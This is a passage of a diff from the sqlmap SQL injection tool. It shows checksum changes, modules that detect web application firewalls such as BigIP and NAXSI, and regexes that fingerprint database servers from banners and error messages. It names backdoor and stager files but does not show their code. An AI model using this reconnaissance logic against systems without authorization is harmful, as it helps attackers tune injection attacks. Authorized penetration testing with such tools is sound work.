604b087dc52dbcb4c3938ad1bf63829c lib/takeover/xp_cmdshell.py
|
||||
9f03972ea5ce2df74d43be5f30f068eb lib/techniques/blind/inference.py
|
||||
ff1af7f85fdf4f2a5369f2927d149824 lib/takeover/udf.py
|
||||
8df5a334823b724a2207a28c94f6fe3d lib/takeover/web.py
|
||||
b4c3264b9b6dcbf00cb7bffa447d1f6c lib/takeover/xp_cmdshell.py
|
||||
8ee04b14ce8a71996b9df83bf709fb55 lib/techniques/blind/inference.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/blind/__init__.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/dns/__init__.py
|
||||
ab1601a7f429b47637c4fb8af703d0f1 lib/techniques/dns/test.py
|
||||
d3da4c7ceaf57c4687a052d58722f6bb lib/techniques/dns/use.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/error/__init__.py
|
||||
8e918c27b796dada3f87ed2fafeb9d8c lib/techniques/error/use.py
|
||||
84b729215fd00e789ed75d9c00c97761 lib/techniques/error/use.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/__init__.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/union/__init__.py
|
||||
211e6dc49af6ad6bd3590d16d41e86db lib/techniques/union/test.py
|
||||
d17ca7177a29d7d07094fc7dd747d4c5 lib/techniques/union/use.py
|
||||
67f0ad96ec2207d7e59c788b858afd6d lib/utils/api.py
|
||||
d71e48e6fd08f75cc612bf8b260994ce lib/techniques/union/test.py
|
||||
db3090ff9a740ba096ba676fcf44ebfc lib/techniques/union/use.py
|
||||
431a0bb6b25cdabd881ca182f3a2dc9d lib/utils/api.py
|
||||
7d10ba0851da8ee9cd3c140dcd18798e lib/utils/brute.py
|
||||
ed70f1ca9113664043ec9e6778e48078 lib/utils/crawler.py
|
||||
c08d2487a53a1db8170178ebcf87c864 lib/utils/crawler.py
|
||||
ba12c69a90061aa14d848b8396e79191 lib/utils/deps.py
|
||||
3b9fd519164e0bf275d5fd361c3f11ff lib/utils/getch.py
|
||||
fee8a47fdbd3b2fe93a5afade80e68e7 lib/utils/har.py
|
||||
ccfdad414ce2ec0c394c3deaa39a82bf lib/utils/hashdb.py
|
||||
12e0e0ab70c6fe5786bc561c35dc067f lib/utils/hash.py
|
||||
e76a08237ee6a4cd6855af79610ea8a5 lib/utils/htmlentities.py
|
||||
@@ -111,39 +112,39 @@ e76a08237ee6a4cd6855af79610ea8a5 lib/utils/htmlentities.py
|
||||
8520a745c9b4db3814fe46f4c34c6fbc lib/utils/progress.py
|
||||
2c3638d499f3c01c34187e531f77d004 lib/utils/purge.py
|
||||
4bd7dd4fc8f299f1566a26ed6c2cefb5 lib/utils/search.py
|
||||
569521a83b2b6c62497879267b963b21 lib/utils/sqlalchemy.py
|
||||
fe2be081f924abf08767ed89ab12b418 lib/utils/sqlalchemy.py
|
||||
caeea96ec9c9d489f615f282259b32ca lib/utils/timeout.py
|
||||
6fa36b9742293756b226cddee11b7d52 lib/utils/versioncheck.py
|
||||
31c51a3cc73120ee9490f2e3fa6d0dca lib/utils/xrange.py
|
||||
b90aae84100a6c4c2bd5eeb4197fbc6e plugins/dbms/access/connector.py
|
||||
ee9cb5dd37a31643cbf4c98ef3a0bdf0 plugins/dbms/access/connector.py
|
||||
a71f7c8ffcb9b250cc785cad830e8980 plugins/dbms/access/enumeration.py
|
||||
38a0c758d9b86915fce894b779e79e4d plugins/dbms/access/filesystem.py
|
||||
fe34217a0b79ac25e3af007dd46cd340 plugins/dbms/access/fingerprint.py
|
||||
5a691580a59eca29bae2283b57682025 plugins/dbms/access/__init__.py
|
||||
c12f4f266830636462eac98e35ebb73e plugins/dbms/access/syntax.py
|
||||
3fc75c350a30597962bc692c973eeeb3 plugins/dbms/access/takeover.py
|
||||
a763887d6e6e99c5a73d9cf450cd84fe plugins/dbms/db2/connector.py
|
||||
17dd890f91c1cde837fbef04327e9cca plugins/dbms/db2/connector.py
|
||||
9d54e01e1576a423159f0e47aeb2837a plugins/dbms/db2/enumeration.py
|
||||
667e50aa06883f0f194bef335015d694 plugins/dbms/db2/filesystem.py
|
||||
9c6ef13c056a256e4704b924af0d7cc6 plugins/dbms/db2/fingerprint.py
|
||||
35ed6e262cf68d4ab2c6111dd5fb0414 plugins/dbms/db2/__init__.py
|
||||
ce8bc86383f2ade41e08f2dbee1844bf plugins/dbms/db2/syntax.py
|
||||
744fb5044f2b9f9d5ebda6e3f08e3be7 plugins/dbms/db2/takeover.py
|
||||
b8dcd6e97166f58ee452e68c46bfe2c4 plugins/dbms/firebird/connector.py
|
||||
4b96106c07daf55892f9420dd7a25b37 plugins/dbms/firebird/connector.py
|
||||
147afe5f4a3d09548a8a1dbc954fe29e plugins/dbms/firebird/enumeration.py
|
||||
4e421504f59861bf1ed1a89abda583d1 plugins/dbms/firebird/filesystem.py
|
||||
d5d19126fec00967932dc75fe7880d6d plugins/dbms/firebird/fingerprint.py
|
||||
f86ace7fcaea5ff3f9e86ab2dce052c5 plugins/dbms/firebird/__init__.py
|
||||
04f7c2977ab5198c6f4aa6233b872ae0 plugins/dbms/firebird/syntax.py
|
||||
1cb1ab93e4b8c97e81586acfe4d030a2 plugins/dbms/firebird/takeover.py
|
||||
3a97bd07cce66bc812309341e7b54697 plugins/dbms/hsqldb/connector.py
|
||||
6fec735f19cf1541729e17bdb6b30f9a plugins/dbms/hsqldb/connector.py
|
||||
6d76854ebce4cad900b47a124a1867a9 plugins/dbms/hsqldb/enumeration.py
|
||||
c0b14e62e1ecbb679569a1abb9cf1913 plugins/dbms/hsqldb/filesystem.py
|
||||
cf5681143cd900fdf198ecd574842ecb plugins/dbms/hsqldb/fingerprint.py
|
||||
0b18e3cf582b128cf9f16ee34ef85727 plugins/dbms/hsqldb/__init__.py
|
||||
65e8f8edc9d18fe482deb474a29f83ff plugins/dbms/hsqldb/syntax.py
|
||||
0a1584e2b01f33abe3ef91d99bafbd3f plugins/dbms/hsqldb/takeover.py
|
||||
f8eaeb71239369e6ceff47596439871b plugins/dbms/informix/connector.py
|
||||
ed489d7e8803e26e1f301da20a72d2bd plugins/dbms/informix/connector.py
|
||||
989e75a65503dd648a45258217ae3371 plugins/dbms/informix/enumeration.py
|
||||
667e50aa06883f0f194bef335015d694 plugins/dbms/informix/filesystem.py
|
||||
f06d263b2c9b52ea7a120593eb5806c4 plugins/dbms/informix/fingerprint.py
|
||||
@@ -152,58 +153,58 @@ f06d263b2c9b52ea7a120593eb5806c4 plugins/dbms/informix/fingerprint.py
|
||||
744fb5044f2b9f9d5ebda6e3f08e3be7 plugins/dbms/informix/takeover.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 plugins/dbms/__init__.py
|
||||
e50b624ff23c3e180d80e065deb1763f plugins/dbms/maxdb/connector.py
|
||||
affabeab69a2c5d4fc66f84b5aeaf24a plugins/dbms/maxdb/enumeration.py
|
||||
2a1b3f3df045c3a00748a13f5166d733 plugins/dbms/maxdb/enumeration.py
|
||||
815ea8e7b9bd714d73d9d6c454aff774 plugins/dbms/maxdb/filesystem.py
|
||||
017c723354eff28188773670d3837c01 plugins/dbms/maxdb/fingerprint.py
|
||||
c03001c1f70e76de39d26241dfcbd033 plugins/dbms/maxdb/__init__.py
|
||||
e6036f5b2e39aec37ba036a8cf0efd6f plugins/dbms/maxdb/syntax.py
|
||||
0be362015605e26551e5d79cc83ed466 plugins/dbms/maxdb/takeover.py
|
||||
e3e78fab9b5eb97867699f0b20e59b62 plugins/dbms/mssqlserver/connector.py
|
||||
9b3a681ff4087824fb43e23679057fa3 plugins/dbms/mssqlserver/connector.py
|
||||
b8de437eaa3e05c3db666968b7d142e4 plugins/dbms/mssqlserver/enumeration.py
|
||||
5de6074ee2f7dc5b04b70307d36dbe1d plugins/dbms/mssqlserver/filesystem.py
|
||||
13cb15e8abfb05818e6f66c687b78664 plugins/dbms/mssqlserver/fingerprint.py
|
||||
77db701972e01e50a61be528e6cad6e2 plugins/dbms/mssqlserver/filesystem.py
|
||||
5207943c31e166a70d5fc7cec8b5ef18 plugins/dbms/mssqlserver/fingerprint.py
|
||||
40bd890988f9acd3942255d687445371 plugins/dbms/mssqlserver/__init__.py
|
||||
400ce654ff6bc57a40fb291322a18282 plugins/dbms/mssqlserver/syntax.py
|
||||
20c669e084ea4d6b968a5834f7fec66c plugins/dbms/mssqlserver/takeover.py
|
||||
48fb283a0dbf980495ca054f7b55783f plugins/dbms/mysql/connector.py
|
||||
f55e550802cc33bec20213da89e2cfdf plugins/dbms/mysql/connector.py
|
||||
7fe94b803fa273baf479b76ce7a3fb51 plugins/dbms/mysql/enumeration.py
|
||||
1bd5e659962e814b66a451b807de9110 plugins/dbms/mysql/filesystem.py
|
||||
e43fda42decf2a70bad470b884674fbe plugins/dbms/mysql/fingerprint.py
|
||||
42568a66a13a43ed46748290c503a652 plugins/dbms/mysql/__init__.py
|
||||
96dfafcc4aecc1c574148ac05dbdb6da plugins/dbms/mysql/syntax.py
|
||||
33b2dc28075ab560fd8a4dc898682a0d plugins/dbms/mysql/takeover.py
|
||||
ea4b9cd238075b79945bd2607810934a plugins/dbms/oracle/connector.py
|
||||
73fc1502dff934f008e3e2590b2609e7 plugins/dbms/oracle/enumeration.py
|
||||
1766b6ad38da5876c257e268bf5004a1 plugins/dbms/oracle/connector.py
|
||||
0471e3bf8310064e28e7c36064056e8d plugins/dbms/oracle/enumeration.py
|
||||
dc5962a1d4d69d4206b6c03e00e7f33d plugins/dbms/oracle/filesystem.py
|
||||
525381f48505095b14e567c1f59ca9c7 plugins/dbms/oracle/fingerprint.py
|
||||
25a99a9dd7072b6b7346438599c78050 plugins/dbms/oracle/__init__.py
|
||||
783d4795fac75f73a7cfba3cd9c3d01c plugins/dbms/oracle/syntax.py
|
||||
c05176f6efe66069756fb78dfa0ed3f6 plugins/dbms/oracle/takeover.py
|
||||
e087d54b9b2617a9f40be15a2bd478c2 plugins/dbms/postgresql/connector.py
|
||||
0451175199516bd47114c50338489a2f plugins/dbms/postgresql/connector.py
|
||||
8377c5ab3de500f9a495fcd9e2a75d3e plugins/dbms/postgresql/enumeration.py
|
||||
48822058c620ffaa2acc599b4d39c667 plugins/dbms/postgresql/filesystem.py
|
||||
c10df993e8b243ba3d6a94e8ae28a875 plugins/dbms/postgresql/fingerprint.py
|
||||
a3a4e82e9a68329c44762897c87acfec plugins/dbms/postgresql/__init__.py
|
||||
76bde1ffb3040ae709156449a583e9ed plugins/dbms/postgresql/syntax.py
|
||||
286f95526a6ce0b8ae9bff6fc3117af0 plugins/dbms/postgresql/takeover.py
|
||||
719fdd12e360458e822950f245d67ad0 plugins/dbms/sqlite/connector.py
|
||||
0119dcaa1d785576cb2709e204b2a432 plugins/dbms/sqlite/connector.py
|
||||
28b9d7d0614e52275a30b5a57fc76027 plugins/dbms/sqlite/enumeration.py
|
||||
954e503cfc8dd1acf9fc50868f5dafb0 plugins/dbms/sqlite/filesystem.py
|
||||
ee430d142fa8f9ee571578d0a0916679 plugins/dbms/sqlite/fingerprint.py
|
||||
6b17cc8cc94a912a0a5cf15acbad5ba4 plugins/dbms/sqlite/__init__.py
|
||||
4827722159a89652005f49265bb55c43 plugins/dbms/sqlite/syntax.py
|
||||
02ab8ff465da9dd31ffe6a963c676180 plugins/dbms/sqlite/takeover.py
|
||||
e3e78fab9b5eb97867699f0b20e59b62 plugins/dbms/sybase/connector.py
|
||||
9b3a681ff4087824fb43e23679057fa3 plugins/dbms/sybase/connector.py
|
||||
e98b82180be4fc5bbf4dfe7247afcbfe plugins/dbms/sybase/enumeration.py
|
||||
62d772c7cd08275e3503304ba90c4e8a plugins/dbms/sybase/filesystem.py
|
||||
deed74334b637767fc9de8f74b37647a plugins/dbms/sybase/fingerprint.py
|
||||
45436a42c2bb8075e1482a950d993d55 plugins/dbms/sybase/__init__.py
|
||||
89412a921c8c598c19d36762d5820f05 plugins/dbms/sybase/syntax.py
|
||||
654cd5e69cf5e5c644bfa5d284e61206 plugins/dbms/sybase/takeover.py
|
||||
be7481a96214220bcd8f51ca00239bed plugins/generic/connector.py
|
||||
f700954549ad8ebf77f5187262fb9af0 plugins/generic/connector.py
|
||||
5390591ca955036d492de11355b52e8f plugins/generic/custom.py
|
||||
4ad4bccc03256b8f3d21ba4f8f759404 plugins/generic/databases.py
|
||||
5eae2e0992a719bfce9cf78ed0a0ea2f plugins/generic/entries.py
|
||||
9fc0c45c314e597fd6ae3b0068daafc0 plugins/generic/databases.py
|
||||
106f19c1d895963e2efa8ee193a537ec plugins/generic/entries.py
|
||||
55802d1d5d65938414c77ccc27731cab plugins/generic/enumeration.py
|
||||
0d10a0410c416fece51c26a935e68568 plugins/generic/filesystem.py
|
||||
2e397afd83939889d1a7a07893b19ae7 plugins/generic/fingerprint.py
|
||||
@@ -212,7 +213,7 @@ be7481a96214220bcd8f51ca00239bed plugins/generic/connector.py
|
||||
070f58c52e2a04e7a9896b42b2d17dc2 plugins/generic/search.py
|
||||
562cfa80a15d5f7f1d52e10c5736d7e2 plugins/generic/syntax.py
|
||||
fca9946e960942cc9b22ef26e12b8b3a plugins/generic/takeover.py
|
||||
156ea264f3f1c7fc18faa251cc1f1a4b plugins/generic/users.py
|
||||
f5c3c5da9ef0f265dc28becbf75ff5e9 plugins/generic/users.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 plugins/__init__.py
|
||||
b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
|
||||
158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_
|
||||
@@ -222,8 +223,8 @@ b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
|
||||
c3cc8b7727161e64ab59f312c33b541a shell/stager.aspx_
|
||||
1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_
|
||||
01e3505e796edf19aad6a996101c81c9 shell/stager.php_
|
||||
0751a45ac4c130131f2cdb74d866b664 sqlmapapi.py
|
||||
d715e78922d1b6bee7c9c03fdfa7ccfd sqlmap.py
|
||||
5a6614331f93051efed1df4f2dcdc067 sqlmapapi.py
|
||||
41a637eda3e182d520fa4fb435edc1ec sqlmap.py
|
||||
08c711a470d7e0bf705320ba3c48b886 tamper/apostrophemask.py
|
||||
e8509df10d3f1c28014d7825562d32dd tamper/apostrophenullencode.py
|
||||
bb27f7dc980ea07fcfedbd7da5e5e029 tamper/appendnullbyte.py
|
||||
@@ -239,12 +240,13 @@ f341a48112354a50347546fa73f4f531 tamper/commalessmid.py
|
||||
28c21fd9c9801d398698c646bb894260 tamper/concat2concatws.py
|
||||
d496b8abd40ea1a86c771d9d20174f61 tamper/equaltolike.py
|
||||
fb3c31b72675f6ef27fa420a4e974a55 tamper/escapequotes.py
|
||||
9efcdbfd3012d3c84ee67e87550d8432 tamper/greatest.py
|
||||
a5770c537c7e05510108af62fa0ad7b0 tamper/greatest.py
|
||||
b3df54fef913223b4f4fd90aa122870f tamper/halfversionedmorekeywords.py
|
||||
a3a0e76922b4f40f422a0daca4e71af3 tamper/htmlencode.py
|
||||
6fa2d48bf8a1020a07d1cb95a14688a8 tamper/ifnull2ifisnull.py
|
||||
8f1626a68b060162023e67b4a4cd9295 tamper/informationschemacomment.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 tamper/__init__.py
|
||||
bff6c89873a75248f6bd68b62a6d86cf tamper/least.py
|
||||
8b9ed7d7d9c8197f34b9d8e36323b60e tamper/lowercase.py
|
||||
377bffa19f0b7ca0616fcea2681db827 tamper/modsecurityversioned.py
|
||||
14a2c4ea49661056a7a6077f91fbc2ed tamper/modsecurityzeroversioned.py
|
||||
@@ -264,7 +266,7 @@ b2331640743170f82be9a8c27f65b206 tamper/space2morecomment.py
|
||||
507a174c64345df8df003ddba93c8cd1 tamper/space2morehash.py
|
||||
0ce89b0d602abbd64344ab038be8acbc tamper/space2mssqlblank.py
|
||||
fa66af20648b5538289748abe7a08fe6 tamper/space2mssqlhash.py
|
||||
ca7597ba264ec731b8a73e9cad5334eb tamper/space2mysqlblank.py
|
||||
b5abc11a45e9646cd0e296548c42e787 tamper/space2mysqlblank.py
|
||||
038b8ea90f9a3a45b9bc67fcdff38511 tamper/space2mysqldash.py
|
||||
5665c217ef8998bfd18f9ef1d8c617bd tamper/space2plus.py
|
||||
a30fa43203d960c7a9d8709bf24ca401 tamper/space2randomblank.py
|
||||
@@ -388,7 +390,7 @@ a0200fc79bae0ec597b98c82894562a5 waf/armor.py
|
||||
d764bf3b9456a02a7f8a0149a93ff950 waf/aws.py
|
||||
dbc89fc642074c6d17a04532e623f976 waf/baidu.py
|
||||
e4e713cc4e5504eed0311fa62b05a6f9 waf/barracuda.py
|
||||
81af1707c0783d205075d887c9868043 waf/bigip.py
|
||||
03df7b2cfccc5eb6b4a6fe987cdb004d waf/bigip.py
|
||||
2adee01cbf513944cd3d281af1c05a86 waf/binarysec.py
|
||||
db312318ee5309577917faca1cd2c077 waf/blockdos.py
|
||||
520ef7b59340b96b4a43e7fdba760967 waf/ciscoacexml.py
|
||||
@@ -401,7 +403,7 @@ ab6f6e3169cb43efcf5b6ed84b58252f waf/comodo.py
|
||||
e4b058d759198216d24f8fed6ef97be4 waf/edgecast.py
|
||||
f633953970fb181b9ac5420a47e6a610 waf/expressionengine.py
|
||||
1df78b6ad49259514cb6e4d68371cbcf waf/fortiweb.py
|
||||
ef151fbc34f16620958ba61dd415ae59 waf/generic.py
|
||||
f183f0bd0923917f070984caf987d5d7 waf/generic.py
|
||||
d50e17ed49e1a3cb846e652ed98e3b3c waf/hyperguard.py
|
||||
5b5382ccfb82ee6afdc1b47c8a4bce70 waf/incapsula.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 waf/__init__.py
|
||||
@@ -410,6 +412,7 @@ d50e17ed49e1a3cb846e652ed98e3b3c waf/hyperguard.py
|
||||
0b50798c12802bf98a850dd716b0d96d waf/knownsec.py
|
||||
bb4177a5a1b4a8d590bf556b409625ac waf/kona.py
|
||||
4fed33de1ffb2214bc1baa9f925c3eb9 waf/modsecurity.py
|
||||
3fc363c592e82e2b1f8f76fad8adafac waf/naxsi.py
|
||||
fe690dfc4b2825c3682ceecef7ee9e6e waf/netcontinuum.py
|
||||
bd55ed30291b31db63b761db472f41ea waf/netscaler.py
|
||||
cbd497453509f144a71f8c05fd504453 waf/newdefend.py
|
||||
@@ -439,24 +442,24 @@ f3727ed5d1b5b06495233c413c8687a6 waf/wallarm.py
|
||||
3792fb08791f0f77fa5386f6e9374068 waf/webknight.py
|
||||
76c50593f1fbb8d4e87ff4781688e728 waf/yundun.py
|
||||
83a57aff89cf698b3e4aac9814a03e67 waf/yunsuo.py
|
||||
2d53fdaca0d7b42edad5192661248d76 xml/banner/cookie.xml
|
||||
e87d59af23b7b18cd56c9883e5f02d5c xml/banner/generic.xml
|
||||
d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml
|
||||
c97c383b560cd578f74c5e4d88c88ed2 xml/banner/mysql.xml
|
||||
b8b56f4aa34bf65365808919b97119a7 xml/banner/mysql.xml
|
||||
9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml
|
||||
d90fe5a47b95dff3eb1797764c9db6c5 xml/banner/postgresql.xml
|
||||
b07b5c47c751787e136650ded060197f xml/banner/server.xml
|
||||
d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet.xml
|
||||
d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml
|
||||
2d53fdaca0d7b42edad5192661248d76 xml/banner/set-cookie.xml
|
||||
d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
|
||||
350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml
|
||||
817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml
|
||||
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
|
||||
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
|
||||
9567590d35dfd9f214b9979e6000b139 xml/errors.xml
|
||||
a279656ea3fcb85c727249b02f828383 xml/livetests.xml
|
||||
14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml
|
||||
5a4ec9aaac9129205b88f2a7df9ffb27 xml/payloads/error_based.xml
|
||||
b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml
|
||||
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
|
||||
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
|
||||
c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
|
||||
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
|
||||
5bd467d86d7cb55fbe5f66e4ff9a6bec xml/queries.xml
|
||||
8f984712da3f23f105fc0b3391114e4b xml/queries.xml
|
||||
|
||||
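The block above is the side-by-side diff of sqlmap's MD5 checksum manifest (txt/checksum.md5): files listed twice with different digests had their contents changed by these commits, while files listed once are unchanged context. As a small, self-contained sketch of how one of those entries can be verified locally (the path assumes the script is run from a sqlmap checkout; the helper name is illustrative, not part of the repository):

```python
import hashlib

def md5_of(path, chunk_size=8192):
    # Hash the file in chunks so large files never have to fit in memory.
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Compare against a manifest entry such as
# "8f984712da3f23f105fc0b3391114e4b xml/queries.xml" from the diff above.
print(md5_of("xml/queries.xml") == "8f984712da3f23f105fc0b3391114e4b")
```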
@@ -18,6 +18,7 @@ def detect(get_page):
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = headers.get("X-Cnection", "").lower() == "close"
|
||||
retval |= headers.get("X-WA-Info") is not None
|
||||
retval |= re.search(r"\ATS\w{4,}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
|
||||
@@ -5,6 +5,7 @@ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.option import kb
|
||||
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
|
||||
from lib.core.settings import WAF_ATTACK_VECTORS
|
||||
|
||||
@@ -13,7 +14,7 @@ __product__ = "Generic (Unknown)"
|
||||
def detect(get_page):
|
||||
retval = False
|
||||
|
||||
page, _, code = get_page()
|
||||
page, headers, code = get_page()
|
||||
if page is None or code >= 400:
|
||||
return False
|
||||
|
||||
@@ -21,6 +22,9 @@ def detect(get_page):
|
||||
page, _, code = get_page(get=vector)
|
||||
|
||||
if code >= 400 or IDS_WAF_CHECK_PAYLOAD in vector and code is None:
|
||||
if code is not None:
|
||||
kb.wafSpecificResponse = "HTTP/1.1 %s\n%s\n%s" % (code, "".join(_ for _ in headers.headers or [] if not _.startswith("URI")), page)
|
||||
|
||||
retval = True
|
||||
break
|
||||
|
||||
|
||||
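One detail in the waf/generic.py hunk above is easy to misread: Python's `and` binds tighter than `or`, so the new condition captures the WAF-specific response either when the probe returns an HTTP error code, or when the check payload was sent and no response code came back at all. A tiny standalone illustration follows; the sample values are invented and stand in for sqlmap's real constants:

```python
# 'and' binds tighter than 'or', so both spellings below group identically.
code = 403
vector = "?id=1 AND 1=1 UNION ALL SELECT NULL-- -"
payload_marker = "UNION ALL SELECT"          # stand-in for IDS_WAF_CHECK_PAYLOAD

explicit = code >= 400 or (payload_marker in vector and code is None)
implicit = code >= 400 or payload_marker in vector and code is None
print(explicit, implicit)  # True True
```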
waf/naxsi.py (new file, 24 lines)
@@ -0,0 +1,24 @@
#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import re

from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS

__product__ = "NAXSI (NBS System)"

def detect(get_page):
    retval = False

    for vector in WAF_ATTACK_VECTORS:
        _, headers, _ = get_page(get=vector)
        retval = re.search(r"naxsi/waf", headers.get(HTTP_HEADER.X_DATA_ORIGIN, ""), re.I) is not None
        if retval:
            break

    return retval
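Every WAF script in this changeset, including the new waf/naxsi.py above, follows the same contract: `detect(get_page)` receives a page-retrieval callback and returns a boolean. Below is a minimal, self-contained sketch of exercising that contract; the stub callback, the fake headers and the simplified `HTTP_HEADER`/`WAF_ATTACK_VECTORS` stand-ins are assumptions for illustration only, not sqlmap code.

```python
import re

class HTTP_HEADER:
    # Stand-in for lib.core.enums.HTTP_HEADER (only the field used here).
    X_DATA_ORIGIN = "X-Data-Origin"

# Stand-in for lib.core.settings.WAF_ATTACK_VECTORS (a single fake probe).
WAF_ATTACK_VECTORS = ("search=<script>alert(1)</script>",)

def detect(get_page):
    # Same shape as the NAXSI script above: send each probe and look for the
    # identifying response header.
    retval = False
    for vector in WAF_ATTACK_VECTORS:
        _, headers, _ = get_page(get=vector)
        retval = re.search(r"naxsi/waf", headers.get(HTTP_HEADER.X_DATA_ORIGIN, ""), re.I) is not None
        if retval:
            break
    return retval

def fake_get_page(get=None):
    # Stub callback returning (page, headers, code) as a NAXSI-protected host might.
    return "<html>blocked</html>", {HTTP_HEADER.X_DATA_ORIGIN: "naxsi/waf"}, 403

print(detect(fake_get_page))  # True
```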
@@ -27,6 +27,14 @@
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" release="4.0" codename="etch"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+lenny">
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+squeeze">
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" release="6.0" codename="squeeze"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+(sid|unstable)">
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" codename="unstable"/>
|
||||
</regexp>
|
||||
@@ -35,8 +43,4 @@
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" codename="testing"/>
|
||||
</regexp>
|
||||
|
||||
<!-- Ubuntu -->
|
||||
<regexp value="^(5\.0\.67)-0ubuntu6">
|
||||
<info dbms_version="1" type="Linux" distrib="Ubuntu" release="8.10" codename="Intrepid Ibex"/>
|
||||
</regexp>
|
||||
</root>
|
||||
|
||||
@@ -3,8 +3,8 @@
|
||||
<root>
|
||||
<!-- MySQL -->
|
||||
<dbms value="MySQL">
|
||||
<error regexp="SQL syntax.*MySQL"/>
|
||||
<error regexp="Warning.*mysql_.*"/>
|
||||
<error regexp="SQL syntax.*?MySQL"/>
|
||||
<error regexp="Warning.*?mysql_"/>
|
||||
<error regexp="MySqlException \(0x"/>
|
||||
<error regexp="valid MySQL result"/>
|
||||
<error regexp="check the manual that corresponds to your (MySQL|MariaDB) server version"/>
|
||||
@@ -14,24 +14,24 @@
|
||||
|
||||
<!-- PostgreSQL -->
|
||||
<dbms value="PostgreSQL">
|
||||
<error regexp="PostgreSQL.*ERROR"/>
|
||||
<error regexp="Warning.*\Wpg_.*"/>
|
||||
<error regexp="PostgreSQL.*?ERROR"/>
|
||||
<error regexp="Warning.*?\Wpg_"/>
|
||||
<error regexp="valid PostgreSQL result"/>
|
||||
<error regexp="Npgsql\."/>
|
||||
<error regexp="PG::SyntaxError:"/>
|
||||
<error regexp="org\.postgresql\.util\.PSQLException"/>
|
||||
<error regexp="ERROR:\s\ssyntax error at or near "/>
|
||||
<error regexp="ERROR:\s\ssyntax error at or near"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Microsoft SQL Server -->
|
||||
<dbms value="Microsoft SQL Server">
|
||||
<error regexp="Driver.* SQL[\-\_\ ]*Server"/>
|
||||
<error regexp="OLE DB.* SQL Server"/>
|
||||
<error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
|
||||
<error regexp="OLE DB.*? SQL Server"/>
|
||||
<error regexp="\bSQL Server[^<"]+Driver"/>
|
||||
<error regexp="Warning.*(mssql|sqlsrv)_"/>
|
||||
<error regexp="Warning.*?(mssql|sqlsrv)_"/>
|
||||
<error regexp="\bSQL Server[^<"]+[0-9a-fA-F]{8}"/>
|
||||
<error regexp="System\.Data\.SqlClient\.SqlException"/>
|
||||
<error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
|
||||
<error regexp="(?s)Exception.*?\WRoadhouse\.Cms\."/>
|
||||
<error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
|
||||
<error regexp="com\.microsoft\.sqlserver\.jdbc\.SQLServerException"/>
|
||||
<error regexp="ODBC SQL Server Driver"/>
|
||||
@@ -53,16 +53,17 @@
|
||||
<dbms value="Oracle">
|
||||
<error regexp="\bORA-\d{5}"/>
|
||||
<error regexp="Oracle error"/>
|
||||
<error regexp="Oracle.*Driver"/>
|
||||
<error regexp="Warning.*\Woci_.*"/>
|
||||
<error regexp="Warning.*\Wora_.*"/>
|
||||
<error regexp="Oracle.*?Driver"/>
|
||||
<error regexp="Warning.*?\Woci_"/>
|
||||
<error regexp="Warning.*?\Wora_"/>
|
||||
<error regexp="oracle\.jdbc\.driver"/>
|
||||
<error regexp="quoted string not properly terminated"/>
|
||||
<error regexp="SQL command not properly ended"/>
|
||||
</dbms>
|
||||
|
||||
<!-- IBM DB2 -->
|
||||
<dbms value="IBM DB2">
